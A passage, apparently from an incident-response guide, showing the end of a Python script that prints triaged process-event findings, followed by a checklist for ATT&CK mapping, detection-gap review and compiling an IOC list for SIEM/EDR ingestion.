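if __name__ == "__main__":
    for f in triage_process_events(SAMPLE_PROCESS_EVENTS):
        print(f"[{f['severity'].upper()}] {f['host']} {f['image']}: {', '.join(f['rules'])}")
        print(f"    {f['cmdline']}")
```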
ATT&CK Coverage Confirmation
Map all identified TTPs to MITRE ATT&CK techniques
Produces structured timeline for report, identifies gaps in coverage, supports threat actor attribution and TI output
Assess detection gaps — what was missed by existing controls?
Document: dwell time, why initial access wasn't detected, SIEM rule gaps, EDR coverage holes. Feeds containment review and lessons learned
Produce confirmed IOC list: IPs, hashes, domains, mutexes, paths
Format for STIX/TAXII or direct SIEM/EDR block list ingestion. Notify threat intel team for wider distribution if appropriate